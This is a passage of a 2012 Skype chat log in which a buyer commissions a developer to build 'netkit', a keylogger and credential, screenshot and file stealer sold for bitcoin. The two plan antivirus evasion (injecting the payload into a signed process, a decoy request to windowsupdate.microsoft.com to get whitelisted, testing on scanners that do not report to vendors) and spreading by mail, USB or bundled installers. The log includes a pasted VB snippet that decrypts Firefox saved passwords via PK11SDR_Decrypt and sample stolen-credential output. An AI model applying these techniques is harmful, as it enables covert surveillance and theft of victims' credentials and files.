  1058. [12/6/2012 1:19:38 AM] ' Tweety HF;: Yeah lol
  1059. [12/6/2012 1:19:43 AM] Shelly Bongo: wow
  1060. [12/6/2012 1:20:10 AM] Shelly Bongo: i know it's too early to say, but i had service providers who were 30+ who made a much worse impression
  1061. [12/6/2012 1:20:24 AM] Shelly Bongo: i do hope we continue working together after this project
  1062. [12/6/2012 1:20:29 AM] Shelly Bongo: and that you'll have time for coding :)
  1063. [12/6/2012 1:20:34 AM] ' Tweety HF;: I hope so too.
  1064. [12/6/2012 1:20:37 AM] ' Tweety HF;: I will no problem.
  1065. [12/6/2012 1:20:47 AM] Shelly Bongo: okay
  1066. [12/6/2012 1:20:55 AM] Shelly Bongo: now before i go i wanted to validate 2 things
  1067. [12/6/2012 1:20:58 AM] ' Tweety HF;: Yes
  1068. [12/6/2012 1:21:51 AM] Shelly Bongo: 1) you will also test with AVs - not just scan4you.net (non-runtime AV) but also install actual AVs and run netkit to see if its runtime is detected (wait for the first message to get sent to see it doesn't block it when it sees outgoing communication)
  1069. [12/6/2012 1:21:55 AM] Shelly Bongo: correct?
  1070. [12/6/2012 1:22:09 AM] ' Tweety HF;: Yes, correct.
  1071. [12/6/2012 1:22:29 AM] Shelly Bongo: which AVs do you have prepared? i'll want the 'big ones' including AVG / Norton / Avira / Kaspersky
  1072. [12/6/2012 1:22:56 AM] Shelly Bongo: also please make sure it's the "Internet Security" product trial and not the AV only
  1073. [12/6/2012 1:23:09 AM] ' Tweety HF;: MBAM, Avast, AVG, Symantec and Norton
  1074. [12/6/2012 1:23:09 AM] Shelly Bongo: because internet-sec products have more security checks
  1075. [12/6/2012 1:23:22 AM] ' Tweety HF;: The only AV i'm really worried about is Avast
  1076. [12/6/2012 1:23:54 AM] ' Tweety HF;: Avast has an auto sandboxie
  1077. [12/6/2012 1:24:11 AM] ' Tweety HF;: I'm thinking of jacking a signature and using it in the malware
  1078. [12/6/2012 1:24:26 AM] Shelly Bongo: "jacking a signature"?
  1079. [12/6/2012 1:24:35 AM] ' Tweety HF;: Yes
  1080. [12/6/2012 1:24:49 AM] Shelly Bongo: can you make sure to test with Avira + Kaspersky too? (i see they're not currently on your list)
  1081. [12/6/2012 1:24:56 AM] ' Tweety HF;: Yes I will
  1082. [12/6/2012 1:25:02 AM] ' Tweety HF;: Avast sandboxie checks a file for a valid signature, if not it runs in a sandbox
  1083. [12/6/2012 1:25:19 AM] Shelly Bongo: you mean a digital signature?
  1084. [12/6/2012 1:25:25 AM] Shelly Bongo: for the exe?
  1085. [12/6/2012 1:25:35 AM] ' Tweety HF;: Yes.
  1086. [12/6/2012 1:25:48 AM] Shelly Bongo: doesn't MS need to sign it using their private keys?
  1087. [12/6/2012 1:25:52 AM] Shelly Bongo: (meaning you can't "jack" it)
  1088. [12/6/2012 1:26:45 AM] ' Tweety HF;: Yup, but I have a way. Not sure if it's still valid though
  1089. [12/6/2012 1:27:13 AM] ' Tweety HF;: I jack the PE of a file that has a signature, run it and suspend the process, clear the bytes in the process and inject netkit bytes
  1090. [12/6/2012 1:27:20 AM] ' Tweety HF;: so it's not really jacking but shelling
  1091. [12/6/2012 1:27:42 AM] ' Tweety HF;: Just need to modify the rootkit and i will test it out soon
  1092. [12/6/2012 1:27:44 AM] Shelly Bongo: but so what if it runs in a sandbox? it will block the key hooks?
  1093. [12/6/2012 1:28:03 AM] ' Tweety HF;: it won't block anything
  1094. [12/6/2012 1:28:10 AM] ' Tweety HF;: but it can exit the application
  1095. [12/6/2012 1:28:18 AM] Shelly Bongo: then why not let it run in the sandbox
  1096. [12/6/2012 1:28:20 AM] ' Tweety HF;: well, it really depends how you will SPREAD the server?
  1097. [12/6/2012 1:28:46 AM] Shelly Bongo: it will be installed
  1098. [12/6/2012 1:28:50 AM] Shelly Bongo: via mail/usb/whatever
  1099. [12/6/2012 1:29:16 AM] Shelly Bongo: some customers might want to bind it with an installer perhaps
  1100. [12/6/2012 1:29:17 AM] Shelly Bongo: etc.
  1101. [12/6/2012 1:29:22 AM] ' Tweety HF;: I see
  1102. [12/6/2012 1:29:32 AM] ' Tweety HF;: so it shouldn't be a problem
  1103. [12/6/2012 1:29:33 AM] ' Tweety HF;: :)
  1104. [12/6/2012 1:29:35 AM] Shelly Bongo: (e.g. installer of an actual application)
  1105. [12/6/2012 1:29:37 AM] Shelly Bongo: great
  1106. [12/6/2012 1:29:44 AM] Shelly Bongo: now
  1107. [12/6/2012 1:30:21 AM] Shelly Bongo: 2) we spoke of the stealers before several times, i would like to make sure we are aligned, do you have a list of the remaining stealers to be coded?
  1108. [12/6/2012 1:30:52 AM] ' Tweety HF;: I have them in our skype logs
  1109. [12/6/2012 1:31:01 AM] ' Tweety HF;: but just to be safe, can you write them on a text file and send it over?
  1110. [12/6/2012 1:31:09 AM] ' Tweety HF;: I don't want to miss anything and disappoint you
  1111. [12/6/2012 1:31:11 AM] Shelly Bongo: okay
  1112. [12/6/2012 1:38:06 AM] *** Shelly Bongo sent credstealer.txt ***
  1113. [12/6/2012 1:38:20 AM] ' Tweety HF;: thanks
  1114. [12/6/2012 1:38:22 AM] Shelly Bongo: please go over it and tell me we're in sync
  1115. [12/6/2012 1:38:37 AM] Shelly Bongo: see the note i added - about autofill recovery
  1116. [12/6/2012 1:38:54 AM] ' Tweety HF;: Yes we are in sync
  1117. [12/6/2012 1:39:04 AM] ' Tweety HF;: Never tried the autofill recovery, I will give it a shot
  1118. [12/6/2012 1:39:14 AM] Shelly Bongo: great
  1119. [12/6/2012 1:39:26 AM] Shelly Bongo: is the screenshotting in yet btw?
  1120. [12/6/2012 1:39:35 AM] ' Tweety HF;: Yes
  1121. [12/6/2012 1:39:42 AM] ' Tweety HF;: Also
  1122. [12/6/2012 1:39:52 AM] ' Tweety HF;: I will separate the stealer + keylogs
  1123. [12/6/2012 1:39:54 AM] ' Tweety HF;: that ok?
  1124. [12/6/2012 1:40:03 AM] Shelly Bongo: what do you mean 'separate' them?
  1125. [12/6/2012 1:40:08 AM] ' Tweety HF;: separate files
  1126. [12/6/2012 1:40:17 AM] Shelly Bongo: no, it should be one file
  1127. [12/6/2012 1:40:24 AM] ' Tweety HF;: Ok
  1128. [12/6/2012 1:40:28 AM] Shelly Bongo: you can separate it into 2 different modules in source code
  1129. [12/6/2012 1:40:31 AM] Shelly Bongo: and the project will Init() both
  1130. [12/6/2012 1:40:46 AM] Shelly Bongo: why do you prefer to separate them into two files anyway?
  1131. [12/6/2012 1:41:03 AM] ' Tweety HF;: I thought it would be more organised for you
  1132. [12/6/2012 1:41:08 AM] ' Tweety HF;: I was planning to split them all
  1133. [12/6/2012 1:41:11 AM] ' Tweety HF;: but it's no problem :)
  1134. [12/6/2012 1:41:30 AM] ' Tweety HF;: I will make it in one log, with screenshot + zipped attachments
  1135. [12/6/2012 1:41:36 AM] Shelly Bongo: i prefer it to be organized in source code (e.g. each item is a module)
  1136. [12/6/2012 1:41:39 AM] Shelly Bongo: the exe should be one
  1137. [12/6/2012 1:41:43 AM] ' Tweety HF;: Yes no problem.
  1138. [12/6/2012 1:42:02 AM] Shelly Bongo: and the screenshots currently are taken when?
  1139. [12/6/2012 1:42:10 AM] Shelly Bongo: configurable interval, right?
  1140. [12/6/2012 1:42:23 AM] ' Tweety HF;: Yes
  1141. [12/6/2012 1:43:10 AM] Shelly Bongo: and they're also stored in memory?
  1142. [12/6/2012 1:43:17 AM] Shelly Bongo: i hope they aren't bmp files :)
  1143. [12/6/2012 1:43:48 AM] ' Tweety HF;: JPG
  1144. [12/6/2012 1:43:58 AM] Shelly Bongo: at full screen res?
  1145. [12/6/2012 1:44:04 AM] ' Tweety HF;: Yup
  1146. [12/6/2012 1:44:22 AM] Shelly Bongo: okay
  1147. [12/6/2012 1:45:06 AM] Shelly Bongo: it should have a backlog/stack of up to X (configurable at source) screenshots per submission
  1148. [12/6/2012 1:45:18 AM] Shelly Bongo: so if a computer is offline for a long time - it won't fill the RAM with screenshots
  1149. [12/6/2012 1:45:40 AM] ' Tweety HF;: No problem
  1150. [12/6/2012 1:46:45 AM] Shelly Bongo: also, before any communication with the PHP (before even the 'installation notice') - please issue 1 HTTP request to windowsupdate.microsoft.com/
  1151. [12/6/2012 1:46:55 AM] Shelly Bongo: (and ignore the response)
  1152. [12/6/2012 1:47:17 AM] Shelly Bongo: this is just in case the computer has some AV that will say "process X is trying to communicate with host Y - allow or deny?"
  1153. [12/6/2012 1:47:29 AM] Shelly Bongo: so it'll happen with a domain that the user is likely to approve
  1154. [12/6/2012 1:47:40 AM] Shelly Bongo: (and 'whitelist' the process)
  1155. [12/6/2012 1:47:40 AM] ' Tweety HF;: sure no problem
  1156. [12/6/2012 1:47:44 AM] Shelly Bongo: thanks
  1157. [12/6/2012 1:47:48 AM] Shelly Bongo: okay
  1158. [12/6/2012 1:47:57 AM] Shelly Bongo: so that's enough for now
  1159. [12/6/2012 1:48:01 AM] Shelly Bongo: i'll let you work :)
  1160. [12/6/2012 1:48:47 AM] ' Tweety HF;: Thanks :)
  1161. [12/6/2012 2:13:47 AM] Shelly Bongo: do you check which AV is installed for sysinfo by querying the Security Center service?
  1162. [12/6/2012 2:13:56 AM] ' Tweety HF;: yes
  1163. [12/6/2012 2:14:17 AM] Shelly Bongo: okay
  1164. [12/6/2012 2:15:02 AM] Shelly Bongo: unrelated to this - do you know of anything like scan4you.net - that can work locally, e.g. some pre-made pre-configured VM cluster that has a software with it to scan a file locally
  1165. [12/6/2012 2:15:13 AM] Shelly Bongo: by all VMs, without relying on scan4you but doing it all locally
  1166. [12/6/2012 2:15:45 AM] ' Tweety HF;: Yeah but its way too much work lol
  1167. [12/6/2012 2:16:48 AM] Shelly Bongo: are there any such things available for download?
  1168. [12/6/2012 2:17:02 AM] Shelly Bongo: i'm sure it's a lot of work..
  1169. [12/6/2012 2:17:13 AM] ' Tweety HF;: I don't think so
  1170. [12/6/2012 2:17:20 AM] ' Tweety HF;: If I make one it will use scan4u
  1171. [12/6/2012 2:17:32 AM] ' Tweety HF;: if you want one the other way
  1172. [12/6/2012 2:17:38 AM] ' Tweety HF;: damn thats a lot of work
  1173. [12/6/2012 2:17:41 AM] ' Tweety HF;: not worth doing it that way lol
  1174. [12/6/2012 2:18:22 AM] Shelly Bongo: ok
  1175. [12/6/2012 4:05:42 AM] ' Tweety HF;: Hi
  1176. [12/6/2012 1:24:41 PM] Shelly Bongo: hi
  1177. [12/6/2012 2:46:21 PM] ' Tweety HF;: For Thunderbird I cannot find a decryption method, it's heavily protected
  1178. [12/6/2012 2:46:32 PM] ' Tweety HF;: but I have the username encrypted + password encrypted
  1179. [12/6/2012 3:36:23 PM] Shelly Bongo: doesn't it use the same encryption as firefox?
  1180. [12/6/2012 3:37:12 PM] ' Tweety HF;: Nope, it uses a key.db and SSL encryption
  1181. [12/6/2012 3:37:21 PM] ' Tweety HF;: No idea how to break that
  1182. [12/6/2012 3:37:34 PM] Shelly Bongo: okay, so provide the encrypted user/pass for now
  1183. [12/6/2012 3:37:58 PM] ' Tweety HF;: Ok
  1184. [12/6/2012 3:39:14 PM] Shelly Bongo: btw, perhaps it's encrypted because you used the master password?
  1185. [12/6/2012 3:39:21 PM] Shelly Bongo: is it still encrypted without a master password?
  1186. [12/6/2012 3:39:28 PM] ' Tweety HF;: I did not use a master password :/
  1187. [12/6/2012 3:39:44 PM] ' Tweety HF;: i just used my normal hotmail credentials
  1188. [12/6/2012 3:42:32 PM] Shelly Bongo: ok
  1189. [12/6/2012 3:42:55 PM] ' Tweety HF;: but
  1190. [12/6/2012 3:42:57 PM] Shelly Bongo: http://www.nirsoft.net/utils/mailpv.html
  1191. [12/6/2012 3:42:59 PM] ' Tweety HF;: some versions
  1192. [12/6/2012 3:43:00 PM] ' Tweety HF;: use plain text
  1193. [12/6/2012 3:43:01 PM] Shelly Bongo: does this show the password?
  1194. [12/6/2012 3:43:50 PM] ' Tweety HF;: yeah that works
  1195. [12/6/2012 3:45:13 PM] Shelly Bongo: http://securityxploded.com/thunderbirdpassdecryptor.php
  1196. [12/6/2012 3:45:19 PM] Shelly Bongo: this one has more tech details and should work too
  1197. [12/6/2012 3:45:28 PM] Shelly Bongo: so it is possible (so long as no master password is set)
  1198. [12/6/2012 3:47:14 PM] ' Tweety HF;: So you want me to use this application?
  1199. [12/6/2012 3:48:00 PM] Shelly Bongo: no :)
  1200. [12/6/2012 3:48:09 PM] Shelly Bongo: i want to figure out whatever it is they do to decrypt it, and do the same
  1201. [12/6/2012 3:48:30 PM] Shelly Bongo: lets do this - in the meantime you can go on to other tasks
  1202. [12/6/2012 3:48:54 PM] Shelly Bongo: and just output the mail srv url + user/pass (encrypted), and specify if it's encrypted or not
  1203. [12/6/2012 3:49:04 PM] ' Tweety HF;: Ok
  1204. [12/6/2012 3:49:11 PM] Shelly Bongo: and we'll add decryption support later, is that okay?
  1205. [12/6/2012 3:49:18 PM] ' Tweety HF;: yes
  1206. [12/6/2012 3:50:18 PM] Shelly Bongo: can you show me the example output of this?
  1207. [12/6/2012 3:50:21 PM] Shelly Bongo: of the stealer
  1208. [12/6/2012 3:50:29 PM] Shelly Bongo: (plz set up incorrect credentials)
  1209. [12/6/2012 3:50:36 PM] Shelly Bongo: (so i don't see your real ones)
  1210. [12/6/2012 3:50:51 PM] ' Tweety HF;: http://puu.sh/1xKxE/e1c6cbb5820e78c99c4a48fea2dd8fa0
  1211. [12/6/2012 3:51:49 PM] Shelly Bongo: can you paste it here plz?
  1212. [12/6/2012 3:52:04 PM] Shelly Bongo: the text, not image
  1213. [12/6/2012 3:52:39 PM] ' Tweety HF;: sec
  1214. [12/6/2012 3:53:10 PM] Shelly Bongo: also please add a line saying "Encrypted:" (with the value of "encType")
  1215. [12/6/2012 3:54:13 PM] ' Tweety HF;: i know the encryption technique
  1216. [12/6/2012 3:54:26 PM] ' Tweety HF;: Triple DES with Base64 Encoding
  1217. [12/6/2012 3:55:09 PM] Shelly Bongo: yes, but i want the output to say if it's encrypted (1) or not (0) - because right now, you don't decrypt it
  1218. [12/6/2012 3:55:14 PM | Edited 3:56:15 PM] ' Tweety HF;: Host: mailbox://pop3.live.comHTTP Realm: mailbox://pop3.live.com
  1219.  
  1220. Username: MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECEOYId7GezaEBBiwsYvidwrpnlbQun2LGU72d5RETwkQ7oU=
  1221.  
  1222. Password: MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECOsOQCqnuzD/BBDqS1EZ6Pf7bwJPWZaerKNm
  1223.  
  1224. Host: smtp://smtp.live.com
  1225.  
  1226. HTTP Realm: smtp://smtp.live.com
  1227.  
  1228. Username: MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECJbRLCQtc01IBBgTTuOIloGMdlzlHOW7T99gr4i4Q70iX6I=
  1229.  
  1230. Password: MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECC0hEupUZ23ZBBDz02Mm0LnS0oUUrUzPd2tg
  1231. [12/6/2012 3:55:31 PM] Shelly Bongo: so when there's a bizarre looking user/pass - i should know if it's the actual creds or it's encrypted
  1232. [12/6/2012 3:56:24 PM] ' Tweety HF;: done
  1233. [12/6/2012 4:01:20 PM] ' Tweety HF;: there's a password
  1234. [12/6/2012 4:01:22 PM] ' Tweety HF;: idk what it is..
  1235. [12/6/2012 4:01:57 PM] Shelly Bongo: ?
  1236. [12/6/2012 4:02:01 PM] Shelly Bongo: what do you mean?
  1237. [12/6/2012 4:02:07 PM] ' Tweety HF;: in thunderbird
  1238. [12/6/2012 4:02:10 PM] ' Tweety HF;: key3.db
  1239. [12/6/2012 4:02:11 PM] ' Tweety HF;: is there
  1240. [12/6/2012 4:02:14 PM] ' Tweety HF;: i dont know how to read it..
  1241. [12/6/2012 4:03:19 PM] Shelly Bongo: okay, we'll add it in later
  1242. [12/6/2012 4:03:29 PM] ' Tweety HF;: ok
  1243. [12/6/2012 4:03:42 PM] Shelly Bongo: so how does it look now? with encType?
  1244. [12/6/2012 4:03:52 PM] ' Tweety HF;: [Thursday, December 06, 2012 3:54 PM] ' Tweety HF;:
  1245.  
  1246. <<< MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECJbRLCQtc01IBBgTTuOIloGMdlzlHOW7T99gr4i4Q70iX6I=
  1247. [12/6/2012 4:04:18 PM] Shelly Bongo: no i mean, you added a line saying "Encryption: [encType-value]" ?
  1248. [12/6/2012 4:05:01 PM] ' Tweety HF;: Oh, yeah I added
  1249. [12/6/2012 4:05:07 PM] Shelly Bongo: ok
  1250. [12/6/2012 8:13:23 PM] Shelly Bongo:             Dim se2 As New System.Text.StringBuilder(Zeile("encryptedPassword").ToString())
  1251.             Dim hi22 As Integer = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se2, se2.Length)
  1252.             Dim item2 As TSECItem = DirectCast(System.Runtime.InteropServices.Marshal.PtrToStructure(New IntPtr(hi22), GetType(TSECItem)), TSECItem)
  1253.             If PK11SDR_Decrypt(item2, tSecDec2, 0) = 0 Then
  1254.                 If tSecDec2.SECItemLen <> 0 Then
  1255.                     bvRet = New Byte(tSecDec2.SECItemLen - 1) {}
  1256.                     System.Runtime.InteropServices.Marshal.Copy(New IntPtr(tSecDec2.SECItemData), bvRet, 0, tSecDec2.SECItemLen)
  1257.                     tempHold &= Environment.NewLine & "Password: " & (System.Text.Encoding.ASCII.GetString(bvRet)) & _
  1258.                     Environment.NewLine
  1259.                 End If
  1260.             End If
  1261. [12/6/2012 8:13:44 PM] Shelly Bongo: it seems like PK11SDR_Decrypt() is the way to go - after doing base64 decoding
  1262. [12/6/2012 8:14:02 PM] ' Tweety HF;: slap it on pastebin for me
  1263. [12/6/2012 8:15:15 PM] Shelly Bongo: http://pastebin.com/BBEYdy52
  1264. [12/6/2012 8:15:33 PM] Shelly Bongo: i took it from the internals of an .exe of a keylogger builder
  1265. [12/6/2012 8:15:51 PM] Shelly Bongo: it's for FF, but the method should work the same way on Thunderbird - at least that's what online resources claim
  1266. [12/6/2012 8:16:49 PM] ' Tweety HF;: you surE?
  1267. [12/6/2012 8:17:59 PM] Shelly Bongo: no, but it seems like it from googling around
  1268. [12/6/2012 8:18:26 PM] ' Tweety HF;: I'll check it out
  1269. [12/6/2012 8:18:30 PM] Shelly Bongo: you're using the NSS libs right?
  1270. [12/6/2012 8:18:31 PM] Shelly Bongo: for FF
  1271. [12/6/2012 8:18:37 PM] Shelly Bongo: okay
  1272. [12/6/2012 8:20:03 PM] Shelly Bongo: https://github.com/jnbek/mozilla_password_dump/blob/master/mozilla_password_dump.c
  1273. [12/6/2012 8:20:11 PM] Shelly Bongo: this one dumps both FF and TB
  1274. [12/6/2012 8:20:13 PM] Shelly Bongo: and uses the same method..
  1275. [12/6/2012 8:20:22 PM] Shelly Bongo: check it out please
  1276. [12/6/2012 10:07:24 PM] ' Tweety HF;: Regarding all the intervals, I think they should all be done at the same time.
  1277. [12/6/2012 10:07:40 PM] ' Tweety HF;: This stops the excess resources and less memory will be consumed.
  1278. [12/6/2012 10:41:21 PM] Shelly Bongo: hi
  1279. [12/6/2012 10:42:05 PM] Shelly Bongo: you are speaking of keylogs + screenshots?
  1280. [12/6/2012 10:42:29 PM] ' Tweety HF;: + files
  1281. [12/6/2012 10:42:31 PM] ' Tweety HF;: everything
  1282. [12/6/2012 10:42:48 PM] Shelly Bongo: i think that the intervals should default to the same value (e.g. 5 minutes) - however the functionality should be there for different intervals to be supported - e.g. i may want to get keylogs every 5 minutes, but screenshots every 1 hour
  1283. [12/6/2012 10:43:52 PM] ' Tweety HF;: That will be hard to organize due to the renaming of the files upon upload, also if you send everything all at once in a single ZIP, it will take less disk space as well. Too much traffic and intervals will make it heavy on the memory.
  1284. [12/6/2012 10:43:54 PM] Shelly Bongo: regarding files - definitely not, it's too complex of a feature to force  it at the same interval as the keylogs - for example the total size of the file transmitted may be large and take more than 5 minutes to transmit
  1285. [12/6/2012 10:44:42 PM] Shelly Bongo: what's the challenge exactly, with keeping different intervals?
  1286. [12/6/2012 10:45:02 PM] ' Tweety HF;: The challenge is that each timer/thread will need to be kept alive while it is running.
  1287. [12/6/2012 10:45:18 PM] ' Tweety HF;: So if i have 1 timer = 1 interval i can use that for everything, then sleep the thread for an hour or so
  1288. [12/6/2012 10:45:44 PM] ' Tweety HF;: if i have 5 different intervals thats 5 timers/threads that will need to all be sleeping at the same time and waking up at different times.
  1289. [12/6/2012 10:45:50 PM] ' Tweety HF;: its too much activity and can slow the computer down
  1290. [12/6/2012 10:46:51 PM] Shelly Bongo: okay, first of all - you can use 1 "sender" thread that always sleeps for 1 minute intervals, and checks whether it is time for ANY data to be sent - logs, files, screenshots
  1291. [12/6/2012 10:47:03 PM] Shelly Bongo: and still have different timers for each of them
  1292. [12/6/2012 10:47:10 PM] Shelly Bongo: but they will need to be at 1 minute increments
  1293. [12/6/2012 10:47:27 PM] Shelly Bongo: that way, you still have 1 thread and 1 timer, and each minute you know what needs to be sent if at all
  1294. [12/6/2012 10:47:41 PM] Shelly Bongo: makes sene?
  1295. [12/6/2012 10:47:44 PM] Shelly Bongo: s/sene/sense
  1296. [12/6/2012 10:47:54 PM] ' Tweety HF;: that uses too many resources, you're saying to have an alpha thread as well as 4 other threads for logs
  1297. [12/6/2012 10:48:06 PM] ' Tweety HF;: if it does a check every 1 minute and keeps running it will take too many resources
  1298. [12/6/2012 10:48:25 PM] Shelly Bongo: what resources exactly will it take too many of?
  1299. [12/6/2012 10:48:31 PM] ' Tweety HF;: RAM
  1300. [12/6/2012 10:48:43 PM] Shelly Bongo: some applications open hundreds of threads, the # of threads is no issue here
  1301. [12/6/2012 10:48:54 PM] Shelly Bongo: RAM is also a non-issue
  1302. [12/6/2012 10:49:02 PM] Shelly Bongo: each thread's timer doesn't consume more RAM
  1303. [12/6/2012 10:49:09 PM] Shelly Bongo: unless you have a memory leak
  1304. [12/6/2012 10:49:13 PM] Shelly Bongo: which you'll have to remedy :)
  1305. [12/6/2012 10:49:24 PM] ' Tweety HF;: No but the threads will be running in the background system
  1306. [12/6/2012 10:49:29 PM] Shelly Bongo: so?
  1307. [12/6/2012 10:49:33 PM] ' Tweety HF;: if the slave has it running for 30+ hours
  1308. [12/6/2012 10:49:38 PM] ' Tweety HF;: it will be a problem
  1309. [12/6/2012 10:49:46 PM] Shelly Bongo: why?
  1310. [12/6/2012 10:50:05 PM] Shelly Bongo: unless you consume more memory every minute/interval, there shouldn't be a problem
  1311. [12/6/2012 10:50:07 PM] ' Tweety HF;: because it will have 4-5 threads running + 1 alpha thread.
  1312. [12/6/2012 10:50:43 PM] Shelly Bongo: look, i need it to have different intervals
  1313. [12/6/2012 10:51:24 PM] Shelly Bongo: and i am asking you to please see how that can be implemented - i'm sure it can without compromising the stealthiness/stability of netkit
  1314. [12/6/2012 10:52:09 PM] Shelly Bongo: from my experience this is definitely something that can be done, i've seen more complex software with 20+ threads and multiple sleepers that worked fine
  1315. [12/6/2012 10:52:22 PM] ' Tweety HF;: Well I can suspend each thread and use events for every tick created if you'd like, so 1 thread and for each count it will be doing something different.
  1316. [12/6/2012 10:52:53 PM] Shelly Bongo: tell me, if we ignore the whole "send data back to the PHP" process/thread issue
  1317. [12/6/2012 10:52:59 PM] Shelly Bongo: how many threads will netkit use?
  1318. [12/6/2012 10:53:10 PM] Shelly Bongo: 1 for logger, 1 for screenshots, and 1 for files?
  1319. [12/6/2012 10:54:01 PM] ' Tweety HF;: I guess so, but my ideal way would have been call it in one thread, pack it and send all at once.
  1320. [12/6/2012 10:54:36 PM] Shelly Bongo: it can't work like this, because 1 functionality must not block/affect the other
  1321. [12/6/2012 10:54:47 PM] Shelly Bongo: each component should run from its own thread
  1322. [12/6/2012 10:54:50 PM] Shelly Bongo: and use its own timers
  1323. [12/6/2012 10:55:08 PM] Shelly Bongo: if there's an issue with RAM overutilization - it's a bug, we'll notice it and have it fixed
  1324. [12/6/2012 10:55:33 PM] ' Tweety HF;: Hmm alright, but I just dont think AV's will like the many threads sending different data outbounds.
  1325. [12/6/2012 10:56:17 PM] Shelly Bongo: sorry for the basic question - but you can share memory between threads right?
  1326. [12/6/2012 10:56:42 PM] ' Tweety HF;: Yes, but the memory in question are not something that need to be shared lol.
  1327. [12/6/2012 10:56:49 PM] Shelly Bongo: :)
  1328. [12/6/2012 10:58:01 PM | Edited 10:58:41 PM] Shelly Bongo: if so, you could have the alpha/master/sender thread take the zip files - if exist, from each worker thread (worker threads: keylogger, screenshotter, file stealer) and send whatever is there, emptying the memory of sent items, and loop this every 1 min
  1329. [12/6/2012 10:58:49 PM] Shelly Bongo: that way you only have 1 thread sending out data
  1330. [12/6/2012 10:58:50 PM] ' Tweety HF;: Ok I will implement that today ^_^
  1331. [12/6/2012 10:59:07 PM] Shelly Bongo: anyway I think AVs work per process, not per thread
  1332. [12/6/2012 10:59:16 PM] Shelly Bongo: but we will find out
  1333. [12/6/2012 10:59:17 PM] Shelly Bongo: :)
  1334. [12/6/2012 10:59:23 PM] ' Tweety HF;: Yup.
  1335. [12/6/2012 10:59:36 PM] ' Tweety HF;: I need to go out for some dinner now, I will finish this off in around an hours time.
  1336. [12/6/2012 10:59:48 PM] Shelly Bongo: okay, bon appétit
  1337. [12/7/2012 1:52:28 AM] ' Tweety HF;: Hi
  1338. [12/7/2012 1:53:11 AM] ' Tweety HF;: Got some urgent things to talk about
  1339. [12/7/2012 10:45:57 AM] Shelly Bongo: hi, write them here even if i'm not answering and i'll answer as soon as possible
  1340. [12/7/2012 10:46:04 AM] Shelly Bongo: what's up?
  1341. [12/7/2012 1:44:46 PM] ' Tweety HF;: The keylogger has a major problem, it cant pass data through delegates because the GC keeps disposing of it
  1342. [12/7/2012 1:44:56 PM] ' Tweety HF;: I need to port it to C#
  1343. [12/7/2012 1:44:59 PM] ' Tweety HF;: Is that ok?
  1344. [12/7/2012 2:36:41 PM] ' Tweety HF;: Nvm I figured out the lib problems haha, guess it's staying on VB :)
  1345. [12/7/2012 2:39:39 PM] Shelly Bongo: okay
  1346. [12/7/2012 2:39:49 PM] Shelly Bongo: btw if you can port to C# it'll be better for me
  1347. [12/7/2012 2:39:56 PM] ' Tweety HF;: I'll port it once its complete
  1348. [12/7/2012 4:40:42 PM] Shelly Bongo: can it be ported back to VB if needed? for example in the future if i'll have a follow-up project asking you to improve/update something in this code
  1349. [12/7/2012 4:40:48 PM] Shelly Bongo: you mentioned you dont do c#
  1350. [12/7/2012 4:40:55 PM] ' Tweety HF;: i can code in c#
  1351. [12/7/2012 4:40:58 PM] ' Tweety HF;: but i prefer not to
  1352. [12/7/2012 4:42:23 PM] Shelly Bongo: okay
  1353. [12/7/2012 10:38:24 PM] Shelly Bongo: how're things going?
  1354. [12/7/2012 10:38:32 PM] Shelly Bongo: what's the status with the stealers?
  1355. [12/7/2012 10:39:10 PM] ' Tweety HF;: Writing them up now :)
  1356. [12/7/2012 10:39:51 PM] Shelly Bongo: and the file stealer?
  1357. [12/7/2012 10:40:00 PM] Shelly Bongo: i am loading an account now with BTC
  1358. [12/7/2012 10:41:03 PM] ' Tweety HF;: File stealer will be done after, saving the best for last haha
  1359. [12/7/2012 11:18:34 PM] Shelly Bongo: okay, i thought at least one of them would be done by now, so there'll be time for testing prior to sunday
  1360. [12/8/2012 12:38:30 AM] Shelly Bongo: FYI, BTC wallet is ready.
  1361. [12/8/2012 2:26:04 PM] Shelly Bongo: hello?
  1362. [12/8/2012 11:49:19 PM] Shelly Bongo: ???
  1363. [12/8/2012 11:54:39 PM] ' Tweety HF;: Hi
  1364. [12/8/2012 11:54:46 PM] ' Tweety HF;: im just finishing a few stealer modules
  1365. [12/8/2012 11:59:59 PM] Shelly Bongo: what do you have left?
  1366. [12/9/2012 12:00:00 AM] Shelly Bongo: what about the file stealer?
  1367. [12/9/2012 12:00:14 AM] Shelly Bongo: i want to get an understanding of when i'll get the fully working and tested product
  1368. [12/9/2012 12:00:34 AM] Shelly Bongo: if there's a 1-2 day delay on the deadline - it's okay, just let me know what's up.
  1369. [12/9/2012 12:01:00 AM] ' Tweety HF;: you sure?
  1370. [12/9/2012 12:01:13 AM] ' Tweety HF;: I had work today so I didn't get much done
  1371. [12/9/2012 12:02:15 AM] Shelly Bongo: if you can get it by the deadline we agreed on, which is tomorrow, then it'll be much better
  1372. [12/9/2012 12:02:32 AM] Shelly Bongo: but assuming you didn't code the file stealer yet, i think we both know it's not going to happen
  1373. [12/9/2012 12:02:50 AM] ' Tweety HF;: haha, dont underestimate me
  1374. [12/9/2012 12:03:03 AM] ' Tweety HF;: ill get it done in an hour :P
  1375. [12/9/2012 12:06:32 AM] Shelly Bongo: there's writing the code, and there's testing it... i think properly testing the functionality takes time, that skills cannot compensate for :)
  1376. [12/9/2012 12:06:56 AM] Shelly Bongo: btw, when fud-testing please don't use sites that submit to AV vendors
  1377. [12/9/2012 12:07:12 AM] Shelly Bongo: chk4me should be the best free choice
  1378. [12/9/2012 12:07:15 AM] Shelly Bongo: i think
  1379. [12/9/2012 12:07:21 AM] ' Tweety HF;: I use elementscanner
  1380. [12/9/2012 12:07:25 AM] Shelly Bongo: (several tool authors from whom i bought told me that)
  1381. [12/9/2012 12:07:29 AM] Shelly Bongo: okay
  1382. [12/9/2012 12:30:01 AM] Shelly Bongo: i never asked, but are you working alone on this? can i trust that once we are over, the source will be only with me?
  1383. [12/9/2012 12:42:00 AM] ' Tweety HF;: Yes.
  1384. [12/9/2012 12:42:04 AM] ' Tweety HF;: I am the only person working on it
  1385. [12/9/2012 1:00:11 AM] Shelly Bongo: okay
  1386. [12/9/2012 1:01:35 AM] Shelly Bongo: did you get to dropbox/etc?
